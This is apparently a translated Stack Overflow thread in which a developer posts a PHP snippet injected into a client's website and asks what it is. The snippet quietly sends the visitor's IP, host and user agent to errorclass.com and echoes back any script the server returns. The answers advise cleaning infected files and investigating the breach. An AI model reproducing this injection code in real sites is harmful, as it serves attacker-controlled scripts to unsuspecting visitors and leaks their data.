我们接到客户的电话,说他们的网站坏了,只是部分加载。查看网站上的代码时,我发现了这个代码段:
<?php
#9da223#
error_reporting(0);
ini_set('display_errors',0);
$wp_nht097 = @$_SERVER['HTTP_USER_AGENT'];
if (( preg_match ('/Gecko|MSIE/i', $wp_nht097)
&& !preg_match ('/bot/i', $wp_nht097))) {
$wp_nht09097 =
"http://" . "error" . "class" . ".com/class" . "/?ip=".$_SERVER['REMOTE_ADDR']
."& referer=" . urlencode($_SERVER['HTTP_HOST'])
."&ua=" . urlencode($wp_nht097);
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL,$wp_nht09097);
curl_setopt($ch, CURLOPT_TIMEOUT, 6);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$wp_097nht = curl_exec ($ch);
curl_close($ch);
}
if ( substr($wp_097nht,1,3) === 'scr' ){
echo $wp_097nht;
}
#/9da223#
?>
由于上面代码中“curl _”函数之一的未定义函数,网站停止工作。
从我可以收集的内容中,它尝试从errorclass.com获取内容,传递域,用户ip和用户代理,并作为响应它查找脚本标记,如果找到,则会打印响应到文件。
我试图查看被请求的内容,但目前该网站似乎只返回一个完全空的文档。
该域名追溯到中国,与该域名相关的IP地址将发往荷兰。
之前有人见过类似的东西吗?
客户端托管同一台服务器上的各种其他站点,谢天谢地,它们似乎都没有受到损害。
编辑:
我对托管的网站进行了更深入的挖掘,看起来有些网站遭到入侵。原始网站不是Wordpress网站,而是另一个网站。似乎某种形式的机器人进行了编辑,因为它们都是在上周二(1月21日)下午12:55同时编辑的。
我们制作的所有网站都会在客户选择的服务器上安装后让客户完全控制。因此,为什么我们花了一些时间才意识到这个问题。
答案 0 :(得分:1)
这是一种“病毒”,还有许多其他代码注入。一旦我将整个专用服务器填充了类似的代码,这就是常见问题。我建议您备份受感染的文件并删除可疑的部分代码。请注意,您很可能还感染了其他php / html文件,因此请在托管文件上进行搜索。
答案 1 :(得分:0)
(这应该是评论 - 但它有点长)
之前有人见过类似的东西吗?
任何将此回答为“是”的人都可能会像你一样困惑。
问题的目的是什么?
现在还有许多重要,紧迫和有趣的问题要提出来。
其中最重要的是:
这是怎么发生的?
为什么你不早点知道呢?